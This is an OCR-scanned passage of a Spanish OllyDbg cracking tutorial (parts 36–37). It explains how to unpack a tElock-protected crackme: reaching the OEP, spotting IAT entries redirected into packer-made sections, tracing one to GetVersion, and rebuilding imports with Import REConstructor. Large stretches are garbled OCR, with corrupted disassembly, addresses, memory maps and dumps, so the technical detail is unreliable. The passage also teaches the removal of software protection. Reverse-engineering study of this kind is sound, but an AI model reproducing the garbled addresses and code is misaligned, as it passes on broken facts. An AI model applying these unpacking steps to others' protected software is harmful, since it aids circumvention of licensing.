50540000 /| 00103000 Map |R R 

60650000 | 00106000 Map ¡RE RUE 
40950000 | DOBAZ000 Priv! Ru Ru 
TIM MAA! MAÑANA AA CANA ce a mc A A AS AA Tui 


Vemos como ayuda que cuando el programa crea secciones las que usara, son marcadas como PRIV 
o PRIVADAS, mas la ayuda que significa ver que esas secciones no estaban en el inicio, antes de 
desempacar, pues, sabemos con certeza que son secciones creadas al desempacar. 


Por lo tanto quitamos el BP y llegamos al OEP, como anteriormente, quitando las tildes de las 
excepciones y llegando a la ultima, poniendo un BPM ON ACCESS en la primera seccion, saltando 
la ultima con SHIFT mas F9. 


PLE en] vel ja] a] il 1 Elm/TiwiHlclv)x)]8)R1»] 5] ESF 


3BEC 

6A FF 

63 600E4500 

68 Ca924200 
64:A1 00000000 


MOU EBP,ESP 
PUSH -1 

PUSH 450E60 
PUSH_42920C3 
MOU EAX, DWORD PTR FS: [6] 


50 PUSH _EAX 
64:8925 0006001 MOV DWORD_PTR FS: [07,ESP 
3304 AS ADD ESP, -583 

53 PUSH EBX 

56 PUSH ESI 


PUSH EDI 
MOU DWORD _PTR SS: [EBP-18],ESP 


20R EDAA! EDA 
Man 


3965 ES 
FF1S DCOA4600 
33D2 


20d 


Alli llegamos nuevamente al OEP y si vemos el el mapa de memoria 


VOU+UUOOY| VUVO 1000] UNFacKriie Fe neager 1M339 | Mu 


60401000| 000440090 | UnPackMe' .teddy code Imag | RU RWE 
50448000) 00956CA0908 | UnPackMe| .teddy data Imag |Ri RWE 
60457000 | 0948089000 | UnPackMe! . teddy Imag | Ru RWE 
580460000 | 090083000 | UnPackMe! . teddy Imag | RU RWE 
60463000 | 00002000 | UnPackMe| .esro Tesouroes Imag | RU RWE 
60465000 | 000040090 | UnPackMe| .teddy SFX, imports| Imag | RW RUE 
90470000 | OOBB9BDA Map ¡RE RE 
50530000 | 00BB2000 Map ¡RE RE 
50540000 | 00103000 Map |R R 
60650000 | 00106000 Map ¡RE RE 
99379999 60001000 Priv [Ru Ru 
2006 Priv ¡Ru Ru 
BB2000 Priv ¡Ru Ru 
40410000) 00001006 Priv ¡Ru Ru 
40420000 00BAIOGA Priv ¡Riu Ru 
BBA30000 | BOBBSODA Map |R R Mevi 
500940000 | 00BB40DA Priv [Ru RU 
BBASO000 | VOBBSODO Priv [Ri RU 
BB0AS0000 | VOBBZ000 Map |R R 
B0A70000 | BOBB1DDO Priv [Ru Ru 
61270000/ 00BB2000 Map |R R 
53030000 | 9090961000 | COMCTL32 PE header Imag |R RWE 
53031000 | 690070000 | COMCTL32| .text code, import; Imag |R RWE 
53CA1000 | 69BB3000| COMCTLI2| data data Imag |R RWE 


Vemos secciones creadas que van a ser utilizadas, estan marcadas como PRIV y alli se dirige el call 
ese indirecto al cual volvemos a entrar traceando con f7. 


BF9142 40 
e D3179F0B 


SETNO BYTE PTR DS: [EDx+40] 
MOV EAX, 9F17D3 

INC ERX 

PUSH DWORD PTR DS: [EAXJ 


INT 26 
ADD EAX, 7CE1AE1D 


Mn EnvY ant rn? 


CD 20 
BS 1DREE17C 


DO Mn?1t7acrara 


Pues traceemos a ver donde llega esta rutina 


=> Jia LI] 


AE PAT 
48 

B3 D3179F90 

48 


> 


INC EAX 
MOU EAX, 9F17D3 
INC ERX 


DWORD PTR DS: [EAXI kerne 132. GetVersion 


INT 20 
ADD EAX, 7CE1RE1D 
MOV EAX, 9F17D7 


CD 28 
AS IDAEE17C 
ES D7179F06 


Vemos que llega aquí a un PUSH que pone la direccion de GetVersion en el stack, y luego salta a la 
api al llegar al RET, por lo cual esta rutina es como un intermediario para llegar a la api 
GetVersion. 


O sea que el desempacador reemplazo la entrada de la api GetVersion, con una direccion que 
apunta a una seccion propia o creada por el y no a una dll, y que si traceamos al final del cuentas 
nos lleva a la api correcta. 


Pues esta es la definicion de una entrada redireccionada, exactamente. 


Por lo tanto cuando verificamos el inicio y final de la IAT no solo debemos verificar que una 
entrada vaya a una dll, si no tambien debemos aceptar como entradas de la IAT, aquellas que tienen 
referencias y que nos llevan a un codigo propio del packer, que resulta ser un intermediario para 
llegar a la api finalmente. 


Por lo cual volvamos a la IAT como estabamos mirando para hallar el INICIO y FINAL. 


ra. "Bá. Ba. Dá3. 
"93.203.003.b8á. 
BO|¡03.183.<03.>»Bá. 

JN ENTES CERES 
03. , 43.03.03. 


"43.pv3.1i03. 303. 
Bl Iva. Tod.mvá. 705. 
atv. .d3.+03.903. 
Ge3.je3.(o 3. 1eá. 
Xx$3.*03.703. 103. 
01%43..13.+43.+43. 
943.H43.143.wé3. 
as3.¿tá. 143.=%43. 
mti.yt3.*t3.Lei. 
63.43.43. ¡tá. 
we3.2343.043.4t3. 
Hbá.pei. -t3.8-3. 
+3 td. prándrá. 
t:3.33.4 ¿3.2 á. 
00/4:3.-:*3.E-:3. td. 

9| 603.5B5. 505. FOS. 

a. hdi. vB. yBá. 
$05. H3.e05.ó0i. 
*03.0.3.4.3.1.3. 
?.3.b.d.s.irind. 
4.3.2.3. Ará.i.d. 

* 


) 


als 
lala 
15]5] 
[5 
a 


ad 


Dí 


27 


Dí 


odá.” 93.195.493. 
193.193.” CENA 

$.3.".3.3.3.Reá. 
Oll.3.).¿d. rd. de 
"¿SUI St 9 rsf -y 
er*ercoorgr ri Ary 
93 TES... ro 7 
1374373460416 
1i"uETTUEFSUAF 6 
...«HiLw£irMwifBOw 
2| + 3Lwr+Lus3Pubdit 


SN oeieeeioioiooosiicio 


Todas esas entradas que van a la seccion VAXxxxxx en mi maquina son entradas redireccionadas, 
van a codigo creado por el desempacador, que si el programa arrancara desde el OEP no existiria, 
por lo cual sigamos subiendo para ver si hallamos el INICIO de la IAT. 


a 
a 
la 
B 


DOS 


DIARIA NANA 


atata SO OOO E da a o 
RARE AUADIADO DIDMO IOMA OO A 


PERIANA AA IADA DON IDOLO TAME 


ES 
NNOSNT 


m DOE DOE 
a DE aaa 
Ne No Ne 
“Jl DOE DOE DO DOE 
ASA OOOO DOE DO DE DOGO 
a . , [e h . . mi e . 


Vemos que luego hay algunas entradas que van a dlls, y luego mas arriba entradas que van a la 
seccion 9Fxxxx otra seccion creada por el desempacador. 


Address 


Comment 


0042069 CALL DWORD PTR DS: [(46B8AC6] DS: [00460AC0I=009F0669 
0042DBEF | CALL DWORD PTR DS: [46B0AC6] DS: [00460AC0I=009F0669 
0043070A| CALL DWORD PTR DS: [460AC0] DS: [00460AC0J=009F0669 
00430731| CALL DWORD PTR DS: [(460AC0] DS: [00460AC0I=009F0669 
B043170F| CALL DWORD PTR DS: [(46BACO] DS: [00460AC0I=009F5669 
60431752 | CALL DWORD PTR DS: [(46BAC68] DS: [00460AC0I=009F0669 
60433301| CALL DWORD PTR DS: [(46B8AC6] DS: [0046B0AC0I=009F0669 
004342EE|CALL DWORD PTR DS: [460AC0] DS: [00460AC0]7=009F0669 
00434336| CALL DWORD PTR DS: [460AC0] DS: [00460AC0I=009F0669 
B0434391/ CALL DWORD PTR DS: [46B8AC6] DS: [00460AC07=009F0669 
0043440D' CALL DWORD PTR DS: [46B8AC6] DS: [900460AC0I=009F0669 
00434804 DS: [460AC0] DS: a ocoS 


00434833 | CALL DWORD PTR DS: [468AC6] DS: [00460AC0]=009F0669 

004355E0|MOU EBP,OWORD_PTR DS: [460AC6] DS: [00460AC0]I=009F0669 
00430044 | CALL DWORD PTR se O DS: [00460AC07=009F0669 
B043DB25| CALL DWORD PTR DS: [46BAC6] DS: [00460AC0I=009F0669 


0044668D' MOV EDI, DWORD PR DS: [(465AC0] 
00446603| MOU EDI,DWORD PTR DS: [460AC8] 


DS: [B00469AC0]I=009F0669 
DS: [00460AC07=009F0669 


Ademas comprobando, vemos que dichas entradas tienen referencias, por lo cual, son entradas de la 
IAT, sigamos subiendo. 


B0S40000 
calla 
00970000 
009FOB00 
(515]21515]51515) 
D0A10000 
0BA20000 
BOAS3DODO 
00940000 
BOASOODa 
DORCDODO 


00103000 
Bo106000 
00091000 
00002000 
00002000 
p00B1000 
00004000 
00003000 
00004000 
00003000 
00002000 


b6 06 6 23 66 
B6 06 ES 2A 06 


A 06 00 RAE 2A 06 


D6 60 AS 2B 06 
D6 O 4C 2B 06 


Q sa 08 44 as Ba 


y que ademas si busco tienen referencias. 


Donde hay entradas que van a una dll, luego la separacion y luego mas arriba ninguna entrada tiene 
referencias. 


UUSDU(TL]| o co Yo Yu bu gu 4L 
Ba46B3ac su Bu 
aa46831C 
aB45aS2c 


0946935C| 8D 


11 600 Al oa 22 ou 
56 66 Al 66 SF 6n 
| 68 88 Ba El 60 C1 


b(+.Cl4.plt..... 
¿+44 pd. de 
104, 00 0, EA 
144.244, ¿+4. E+t. 
x+4."+4.L+4,.+8. 


pu 
. 
” 


Ir 
" 
ja 
w 
J 
«% 


ss 


UY? A O ds 
BOODO: + *. PRpHH00A ADD 


Map |R 

Map |RE RE 
Priv | Ru RU 
Priv | Ru RU 
Priv [Ru RU 
Priv Ru 

Priv | Ru RU 
Map |R R Dev 
Priv [Ru Ru 
Priv [Ru RU 
Mao |R R 


DS: [00465894 ]=00416190 


a A 
e..ounaas 
+u rd rwbi 


um. .. 


DG 60 au 


09 33 99 Al 00|..i.4.i.”. 
09 7F 99 Al 00/A.i.P 
1 09/02 ee Al 09|1.1.: 


1 
¡+ 


: i.tei. 
ARAEMSPR 1.Xa 1 «di. dl. 


Como en el CRUNCH el inicio de la IAT es 460818 el largo 710 y el OEP es 4271B0, restandole 
la image base. 


OEP= 271B0 
INICIO o RVA= 60818 
LARGO= 710 


Por lo tanto abramos el IMP REC sin cerrar este OLLYDBG. 


e: ebherramientas tf g-hui-j-k ti 

SEDE de racer rn exe  (000002Aa) 
c:4archivos de programa! techsmithisnagit 8ksnagit32.exe [(OODDOSF4] AM 
c:4archivos de programa+openoffice.org 2.0 program'soffice. bin [00000584] 


La 


Y coloquemosle los valores que hallamos. 


l 


147 Infos needed 


DEP [00027180 187 AutoSearch l 
RAYA, [00060818 Size [0000710 


Load Tree Save Tree | Get Imports | 


Ahora apreto GET IMPORTS 


adwapi32.dll FThunk: 0005081 3 NbFunc: 5 [Uscimal 5 valid: YES 
comctl32. dll FT hunk:00060830 NbFunc:2 (decimal: 2] valid: YES 


E-E 


+ 


? FThunk:0006083C NbFunc:EB (decimal: 235] valid: NO 
2 FThunk:O00060BEC NbFunc:49 [decimal:169) valid: NO 
winspool.drv FThunk:00060E 94 NbFunc:8 [decimal:8] valid: YES 
comdlg32. dll FT hunk:ODO60£B8 NbFunc:9 (decimal: 9] valid: YES 
ole32. dll FThunk:O0D60€£E 0 NbFunc:10 (decimal:16] valid. YES 
oledlg.dll FThunk:00060F24 NbFunc:1 [decimal:1] valid YES 


+4 


Hol + 


Como vemos el IMP REC detecta que hay entradas redireccionadas y nos pone NO en algunas, 
miremoslas apretando SHOW INVALIDS que nos mostrara las invalidas. 


Imported Fur 
rea: DOO6083€ ptr:004/10000 
rea: 00060840 ptr:00410011 
rva:00060844 ptr:00410022 
ra: 00060848 ptr:00410033 
rea:D006084€C ptr:00410041 
rva:00060850 ptr:004/10050 
rva:D00060854 ptr:0041005F 
rea:00060858 ptr:0041007F 
rea: DDOGO85C ptr:0041008D 


Vemos que el IMP REC nos muestra lo mismo que vimos en la IAT entradas que no van a ninguna 
api, y que van alli en la imagen, a direcciones de secciones creadas por el packer o codigo propio 
del mismo. 


Por supuesto no vamos a tracear todas esas entradas incorrectas a mano, hay varios metodos para 
repararlas, el IMP REC trae algunas posibilidades, otros metodos pueden hacerse a mano pero no 
traceando jeje 

Todos estos metodos los veremos en la parte 37, para que tengan bien claro el tema de las apis 
redireccionadas repasen bien esta parte, asi en la parte siguiente vemos metodos para repararlas. 
Vemos que asi como esta, no podemos reparar un dumpeado, pues debe tener el IMP REC todo 
YES o sea todas las entradas deben apuntar a apis de dlls, y no a entradas redireccionadas ni codigo 
choto y eso debemos arreglarlo nosotros. 


Hasta la parte 37 
Ricardo Narvaja 
17/03/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 37 


En esta parte veremos algunos de los posibles metodos para reparar entradas 
redireccionadas, pero el tema no se agotara aquí, porque al igual que para llegar al OEP, hay tantos 
metodos como packers existen, y cuando veamos algunos otros packers saldran metodos nuevos 
tanto para llegar al OEP como para reparar la IAT. 

El tema es que estos metodos son ideas generales, y en otros packers pueden funcionar o no, 
O quizas necesitan cierta adaptacion según el caso, por lo cual es bueno siempre intentar y practicar 
mucho, e ir variando y probando. 

De la misma forma que cuando vimos como llegar al OEP, daremos los metodos mas 
generales, y mas adelante cuando veamos distintos packers, adaptaremos estos metodos o usaremos 
alguno nuevo según el caso, que quizas no este aquí al no ser muy general. 


Cc] File View Debug Plugins Options Window Help 


mex] e jul vis] sia] a] + 1/elmir[wjn/c]7]k/B]R]--[s] ¿sl 


aaq4271 E] 55 PUSH_EBP Real entry point of SFX code 
Bn427 S28BEC MOU EBP,ESP 

6A FF PUSH -1 

62 600E4500 PUSH 450E60 

68 [38924200 PUSH_42920C8 


MOU EAX, DWORD PTR FS: [6] 


64:A1 000004Ba 

50 PUSH_EAX 

64:8925 BO0BBB! MOU DWORD _PTR FS: [61,ESP 
3304 AS ADD ESP, -583 


o 
1DAATNDINA 


PUSH EBX 
56 PUSH ESI 
57 PUSH EDI 
3965 ES MOU DWORD _PTR SS: [EBP-18],ESP 
FF1S DCoA4600B 
3302 20R EDX, EDX 
3AD4 MOU DL, AH 
3915 34E64500 |MOU DWORD _PTR DS: [45£634],EDXx 
3BC8 MOU ECX, EAX 


A 
31E1 FFOB0006 | AND ECX, OFF 
8980 30E64599 |MOU DWORD PTR DS: [45E6307,ECxX 


EBP=OBI2FFFO 


Bueno aquí estamos en el OEP del telock que como vimos la parte anterior tiene entradas 
redireccionadas a varias secciones que fueron creadas por el mismo packer en tiempo de 
desempacado. 


[Address [Hei dump__ 22222 fe |] 

sz 166 66 66 06 66 66 66 s0 66 66 66 00 FB 6B DA 77 ....o.. Co... -Kru 

als vu ruTló rwEÚ rwáx rw 
E 


....! .c .... 


5.1.0.1.$01.501. 
Set 06i.*Bi.q6Bí. 
00(.401.061.<Bi. 
T0i."6i. 6i.»Bi. 
”8¡.201.CO01.b9í. 
181.1801.<9(.Bí. 
<9i(.Ir0i.M9i.*8i. 
.$i.,41.=0i.N4i. 
“vi¡.pri.livi.3v i. 
Ii. Toi. mPdi. Oi. 
19i¡..0i. 401.90 i. 
Gei.joi.foi.1ei. 
X$ 1.0 1.701.106 L. 
%4i1..ti.+2i.+£i. 
9%1.H2i.W2i.wéi. 
adi.¿ti.12i.=£i. 
a 


MAPA 
Rd 
AAA 


Ahi teniamos una vista de la IAT con sus entradas para reparar, realmente hay packers que 
redireccionan uno a dos entradas, por lo cual siempre es bueno conocer metodos para reparar una 


sola entrada, que es lo que veremos al inicio, obviamente si son muchas entradas a reparar esto no 
sirve, porque te volves viejo, pero hay que saber como detectar que api corresponde a cada entrada, 
a veces para verificar alguna entrada que es dudosa. 


Tomemos la entrada que manualmente habiamos traceado y sabiamos que finalmente va a 
GetVersion. 


PUSH ESI 
PUSH EDI 
ES MOU DWORD_PTR SS: [EBP-18],ESP 
DCOA4606 
2 FOR EDX, EDX 


4 
S 24E64500 |MOU DWORD PTR DS: [45E6341, 
MOV ECX, ERX 

FFO0B606 [AND ECx,BFF 

S0ES4500 MOU DWORD PTR DS: [45£630],ECx 


ECX» EDx 


Alli esta el CALL y en el DUMP, la entrada de la IAT 460ADC con su contenido que apunta en mi 
maquina a 9F06F7, tambien tenemos el IMP REC abierto con todos los valores que hallamos a 
mano, de RVA, SIZE y OEP escritos, y a la vista las entradas malas. 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


áttach to an Active Process 


c:idocuments and settingsvricardotescritorio.unpackme_telock0.98.exe [ODD00 


Imported Functions Found 
adwapi32.dll FThunk:00060818 NbFunc:5 [decimal:5] valid: YES 
1- cometl32. dll FThunk:00060830 NbFunc:2 (decimal: 2] valid: YES 
? FThunk:D0006083C NbFunc:EB (decimal: 235] valid: NO 
1-2 FThunk:0D0O060BEC NbFunc:439 [decimal:169] valid: NO 
winspool. dry FThunk:00060£ 94 NbFunc:8 (decimal:8] valid: YES Bo 
comdlg32. dll FThunk:O0060EB8 NbFunc:9 (decimal: 9] valid: YES 


)- ole32. dll FThunk:ODO6DEE O NbFunc:10 [decimal:16) valid:YES 
oledlg.dll FThunk:00060F24 NbFunc:1 (decimal: 1] valid: YES 


+ 4-42 4-44 


-Log 
147 read successfully. 


Current imports: 
6 [decimal:6] valid module(s) (added: +6 (decimal: +6]] 
18D (decimal: 445] imported function(s]. (added: +1BD [decimal:+445 


(1183 (decimal: 387] unresolved pointer(s)] ladded: +183 (decimal: +387]] 

147 Infos needed New Import Infos (MD+ASCI+L 
DEP [00027180 _lAT AutoSearch | _lAT AutoSearch || Aa, [ODODODOD Size [DOC 
RWA, 100060818 Size [00000710 IY Add new section 


Pongamos el IMP REC tambien para ver esa entrada 


Imported Functions Found 


rea: DOD604.CC ptr: 009F0695 
rva:DOO604D0 ptr: DO9FOEB5 
rva:DO0604D4 ptr: DO9FOEC3 
rva:000604D8 ptr. OO9FOGE6 


rva: 0006040 ptr: 009FO708 
rva:ODOB0AE4 ptr:009FO714 De 
ra: DOO604E8 ptr: DO9FO?24, 
ra: DOO60SEC ptr: DO9FO73B 


60ADC corresponde a la entrada de la IAT 460ADC. 


Volvamos al OLLYDBG y a nuestra entrada, ya vimos que traceando a mano llegamos a una api, 
sabemos que el OLLYDBG trae un traceador incorporado, vamos a usarlo para llegar mas rapido, 
ya que aquí fueron 5 o 6 lineas que traceamos y ya llegamos a la api, pero hay packers que dan 
vueltas y vueltas antes de llegar a la misma, por lo cual el traceo automatico suele ser util. 


uy ==] PUSH ES]I 
15) Y PUSH EDI 
Ba 38965 ES MOV DWORD_PTR SS: [EBP-18],ESP 
E FF1S5 DCOA4600 CALL_DUORD, PTR DS: [4684003 
3302 OR EDX, EDX 
MOU DL, AH 


4 
aQ15 a4FRdCOA [MAI MARN PTR NMa-TácFa2d1 FO 


Ponemos antes de tracear un BP en el retorno de la api, no sea cosa que nos equivoquemos y quede 
traceando sin parar nunca. 


TestDbg - UnPackMe_tElock0.98.exe - [CPU - n 


F9 


j 


Restart Ctrl+F2 
Close AlH+F2 


IDO 


Step into F? 
Step over Fs 
Animate into Ctri+F? 
Animate over Ctri+F8 
Execute till return Ctri+F9 
Execute till user code AltH+F9 


000 
oa a 


oa 


Open or clear run trace 
Trace into Ctrl+F11 
Trace over Ctrl+F12 


En DEBUG-SET CONDITION tenemos la posibilidad de elegir las opciones en las cuales el 
OLLYDBG detendra el traceo. 


Condition to pause run trace 


Pause run trace when any checked condition is met: 


T ElPisinrange [00000000 IR [00000000 


T ElP is outside the range [00000000 a [00000000 
T Condition is TRUE | +] 


| Command is suspicious or possibly invalid 


T Command count is m (actual Po. ] Reset 


[Command is one of 


In command, AS, A32, RÁ, RB and CONST match any register or constant 


Cancel | 


Alli vemos la ventana de CONDICIONES PARA PAUSAR EL TRACEO, veremos algunas que 
pueden funcionar y se pueden adaptar según el caso. 


EIP IS IN RANGE significa que si ponemos la tilde en este renglon, OLLYDBG parara cuando el 
EIP se encuentre dentro del rango de valores que especifiquemos en la derecha, por ejemplo. 


Condition to pause run trace 


Pause run trace when any checked condition is "pl 
hh is in range (00401 000 100500000 


T— ElP ¡is outside the range [00000000 ... ¡OOODDODO 


Condition is TRUE y 


T Command is suspicious or possibly invalid 


Command count is lo. (actual Po. ] Reset 


Command is one of 


In command, RS, A32, RÁ, RB and CONST match any register or constant 


Cancel | 


Este ejemplo significa que OLLYDBG traceara hasta que vea que EIP vale algun valor 
comprendido entre 401000 y 500000 por supuesto esto es un ejemplo, y no nos sirve en este caso, 
ya que queremos que se detenga en la api. 

Para hallar los valores entre los cuales queremos que OLLYDBG se detenga en este caso miramos 


el mapa de memoria. 


00320000| 00096099 
00330000) 000410009 
00330000 | 000910009 
00390000 | 000901009 
0340000 | DOBB100a 
00389000 | 00901000 
00490000 00991006) UnPackMe 
00491000| 00044000) UnPackMe!| . teddy 
50448000 | BBBBCODO | UnPackMe| . teddy 
00457000| 00999000) UnPackMe!| . teddy 
0045690009 | 00993090) UnPackMe!| . teddy 
60463000 | 000562000 | UnPackMe! esco 
004650009 | 009004009) UnPackMe!| .teddy 
00470000 | DOBBSO0O 
00530000 | DOBBZ2000 
00540000 | 00103009 
00650000 | BOBEEDAS 
009700009| 0009010009 
DO9FDOOO | DOBBZ000 
DOABBO0Ó | DOBBZ00B 
00A10000| 0001006 
D0A20000 | DOBBID0B 
D0A30000 | DOBBZO0B 
00940000 | 00004000 
BDASO0MÓ | BABBZOBA 
B0AGB000 | BOBBZ00B 
009700009 00991000 
61270000| DOBBZ2000 
Cc30000 690001990. COMCTI 
59c31009 60079009) COMCTI ¿text 
100003000 «data 
¿«PSro 
.reloc 
«text 
«data 
9010 ¿«PSro 
5B486000 als «reloc 
50160000 | 00001096: serwudiw 
5D0161000| 00093990) serwudrv| .text 
50164000 | 00001996) serwudrv| .data 
50165000 | 00001996) serwudrv| .rsro 
OS 60001000 | serwudrv| .reloc 
2F30000| 00001900 | WINSPOOL 
Ferca 10020000 WINSPOOL| .text 
72FA1000/| 00002000 | WINSPOOL| .data 
FA3990| 09001990 | WINSPOOL| .esrc 
72FA4000 | 900002000 | WINSPOOL| .reloc 
74CC0000 BB oledlg 
74CC1000 1000/oledlg ¿text 
74CD2000 BB /oledla ¿data 
74004000 008996 oledlg ¿«ISrc 
74CD0F900| 00001996 oledlg .«reloc 
76360000 | 960001909 | comdl 932 
409030000 | comdlg32 .text 
B| 00004998! comdl932| data 
60612000 comdl932| .rsro 
40003900 | comdl932| .reloc 
76800000 | 9600015000) WINMM 
76801000 | 0001F5900) WINMM ¿«tent 
76820000 | 60002000) WINMM «data 
76B22000! B009AB00! WINMM ¿PSro 


Alli vemos marcado en celeste la zona que nos interesaria que se detenga OLLYDBG al tracear, o 
sea desde donde se encuentra la primera dll en adelante, no queremos que pare ni en las secciones 
del exe, ni en las secciones creadas por el packer ya que ese es codigo intermedio, necesitamos que 
pare en las dlls, por lo tanto si marcamos la primera casilla y ponemos que ElIP este entre 58000000 
y TFFFFFEF que es la direccion maxima seguro que parara en alguna dll (aclaracion no importa 
que no elegimos la direccion exacta de la primera dll ya que vemos que no hay codigo entre 
58000000 y el inicio de la primera dll 58c30000 asi que alli no va a parar, pero para evitar poner 


PE header 
code 
data 


resources 
SFX, imports 


PE header 
code, import 
data 


resources 
relocations 
PE header 
code, import 
data 


resources 
relocations 
header 
code, import 
data 
resources 
relocations 
header 
code, import 
data 
resources 
relocations 
header 
code, import 
data 
resources 
relocations 
header 
code, import 
data 
Tesources 
relocations 
PE header 
code, import 
data 
Tesources 


cifras exactas puedo sin problemas redondear) 


pra] 
mm 


ra] 
m 


R 
RU 


DIDIIDIIDIDIIDIIDIIIDIDIIDIDIDIDIDIDIDIDIDIDIDIDIDIDDDDA 


MevicerHarddiskVolumeiswI! 


MevicerHarddiskVolumelsWwII 


Condition to pause run trace 


Pause run trace when any checked condition is met: 


IV ElP is in range [58000000 Lo [7EFFFFFF 


T EIP is outside the range [00000000 y [00000000 
f” Condition is TRUE | +] 


| Command is suspicious or possibly invalid 


TP” Command count is Ío. (actual fo. ) Reset | 


Command is one of 


In command, R8, A32, RA, AB and CONST match any register or constant 


Cancel | 


Quiere decir entonces que OLLYDBG ejecutara traceando linea a linea y en cada una verificara que 
se cumpla esa condicion, o sea que ElP este en la seccion de alguna dll y si es asi parara. 


TestDbg - UnPackMe_tElock0.98.exe - [CPU 
[c] File View MEA Plugins Options Window  Helf 


Run F9 
Pause F12 
Restart Ctri+F2 
Close AlHF2 
Step into F? 
Step over Fs 
Animate into Ctri+F? 
Animate over Ctri+F8 
Execute till return Ctri+F9 
Execute till user code AltW+F9 
Open or clear run trace 


Trace over De 


Set randitinn FrelaT 


Lleguemos hasta el CALL poniendo un BP en el mismo. 


a] 15m ]1)9)8 e] 7 


Real e 


PUSH_EBP 
MOU EBP,ESP 
6A FF PUSH -1 

68 6B0E4500 PUSH 450E60 
68 Ca924200 PUSH_42920C3 

64:A1 00000090 | MOU O PTR FS: [6] 


50 PUSH 
64:8925 0000001 MOV DWORD_PTR FS: [07,ESP 
3304 AS ADD ESP, -58 


53 
56 
57 H_EDI 

MOU DWORD_PTR SS: [EBP-18],ESP 


X0R EDX, EDX 
MOU DL, AH 


A a 


3965 ES 
FF1S DCOA4600 
33D2 


MAT MAT Araña 


Si teniamos puesto un MEMORY BREAKPOINT que usamos para llegar al OEP lo quitamos y 
llegamos al CALL. 

Alternativamente si no es un CALL que esta al inicio y no sabemos donde esta el CALL O JMP, 
podemos marcar los bytes de la entrada y poner un MEMORY BREAKPOINT ON ACCESS en la 
misma, con los cual al dar RUN, parara cuando lea la entrada o sea en el JMP o CALL 
correspondiente. 


ua 
Di 
lo 
sa 
0 
m| 
a 
a 
| 
D 
lo 
| 
Dl 
+ 


e dd o dd] 


ooo 


Search for Memory, on write 
Follow DWORD in Dump Remove memory breakpoint 


A A A 


+ 
oboe 


Bueno ya llegamos al CALL con alguno de esos dos metodos. 


En :A1 B000BDaa Lp EA OeosD PTR FS: [0] 
64:8925 BO04BO! MOU DWORD _PTR FS: [67,ESP 
3304 AS A -58 


H_EDI 
MOU DWORD_PTR SS: [EBP-18],ESP 


S0R EDX, EDX 
4 MOU DL, AH 
34E64500 [| MOU DWORD PTR DS: [45£6347,EDXx 


AX 
FFO06B0a BFF 
30E64500 [| MOV DWORD PTR DS: [455630], ECXx 


5 ES 
3 DCoA46na 


Pongamos a tracear al OLLYDBG 


7 [5] Plugins Options Window Hi 


| Run F9 
SE Restart Ctrl+F2 
Es Close Alt+F2 
se Step into F7 
SE Step over FS 
ES Animate into Ctrl? 
S E Animate over Ctri+F8 
ES Execute till return Ctri+F9 
E y Execute till user code AlH+F9 
8 


gs  Openor clear run trace 


EDS AE] 
Je 
Trace over Ctri+F12 


Es importante elegir TRACE INTO para que tracee linea a linea, si elegimos TRACE OVER no 
entrara en los calls y puede fallar. 


18] Pue YEW  UCUUY  FIUQNIS —QPLIDIIS A 


3B43 30 MOU ECX, DWORD PTR DS: CEAX+30] 
3B31 B09090009_|MOU_EAX, DWORD _PTR DS: [ECX+BB] 
OFB791 ACOBOBO! MOUVZX EDx,WORD_PTR DS: [ECX+ACI 
33F0 BE Z0R EAX, FFFFFFFE 


Bs EAX, 3 
ae OR EAX, DWORD PTR DS: [ECX+A8] 


SHL_EAX, 8 
A4000B0B_ |OR_EAX, DWORD PTR DS: [ECX+A4] 
RETN 
PUSH_ESP 
ADD BYTE PTR SS: [RBPI,CL 
PIUISH FAX 


[ala] 


Alli paro por la condicion que colocamos si vemos en OLLYDBG abajo 


Conditional pause: ElP in range 58000000. 7FFFFFFF 
¿¿ Inicio ¿ricardonarva... E Yahoo! M 


Paro porque EIP esta en el rango 58000000-7FFFFFFE, es bueno verificar esto para ver que no 
haya parado por alguna excepcion u otro motivo. 


ST2 empty 0.B 
B042710C] RETURN to UnPaokMe. 00427100 from ODSFOSF 7 
FFEFFEFF : 


.D04667DA from UnPackMe. 00466 


Lo siguiente que hay que verificar es que al ejecutar la api vuelva al programa a continuacion del 
CALL, porque hay packers que para confundir van primero a una api, y a continuacion a una 
segunda api, por lo tanto la api verdadera sera la ultima, y en la cual veamos en el valor de retorno 
de la misma, que retorna al programa a al instrucción siguiente al CALL. 

Por supuesto en este caso, retorna a la linea siguiente del CALL de donde partimos. 


B04271D0C) RETURN 
ntdll.7C Address 


Show ASCH dump 
RETURN 1 Show UNICODE dump 
Lock stack 


EEES Copy to clipboard 
EEN] e 
"o Edit 
Push DWORD 
Pop DWORD 
UnPackHs Search for address 
Search for binary string 


rc9137D08 
BO4667AB 
BO466872 
15151a]51=15]51%] 
ls ]s 115151515) 
BOBS995E 
BO12FFAD 
15Js]s 1515151515) 
0427180 
DO4665FF 
FFED6674 


JE 


0 
B B646672B| UnPackMe 
E ntdlL. 70 
. Go to EBP 
G Pointer i 
Se poeal Go to expression 
B0450E609| UnPackMe 


FEFFFFFF 
aaL2FFRO 


mr mal 


8965 ES 

FF1S DCOA4600 
33D2 X0R EDX, EDX 

MOU DL, AH 

MOU DWORD _PTR DS: [45E634],EDX 


8AD4 
8915 34E64500 
8BCc3 MOV ECX. EAX 


Vuelve a 4271DC como corresponde. 


Bueno ahora nos falta ver que api es porque OLLYDBG no nos dice nada, la primera forma es 
analizar el codigo aquí mismo de la dll. 


28] EUA ER) PEJE E) a — __ __-_ _ 


8848 30. MOV ECS, DWORD PTR DS: CEAX+30] 
ees1 Bo00Ba00 |MOU EAX, DORA PTR NS: TECXERA? 
ór8791 ACaRaBal HOUZA EDX 


DE 


151=] 
ASOBBOOa 
15=] 


Ascoocoo lor Entro A emble ia 
RETN Label : 
PUSH ESP 
[515] Comment ; 
Breakpoint 


90909090 
3 Run trace 


és 1s816817C PUSH 7CS1 
ES DEDFFFFF 


ey dy pas EL 
64:41 1soeseoo | mou Enzo Follow in Dump 
40 30 MOU EAX, D 


ne 132. 7C8024CB 
nel32.7C084132A 


Search for 
Find references to 
Vier 

Copy to executable 


Duran dehunned nraress Sran nhiert Files . 


SE 


BBB! MOV EAX, DWORD PTR FS:[18] 

MOU ECX, DWORD PTR DS: [EAX+30] 
MOU_EAX, DWORD _PTR DS: [ECX+B0] 
MOUZA EDX,WORD_PTR DS: [ECX+ACI 
XOR EAX, FFFFFFFE 

SHL_EAX, BE 

OR EAX, EDXx 

SHL_EAX, 

OR EAX, DWORD PTR DS: [ECX+A8] 
SHL_EAX, 8 

OR_EAX, DWORD PTR DS: [ECX+A4] 


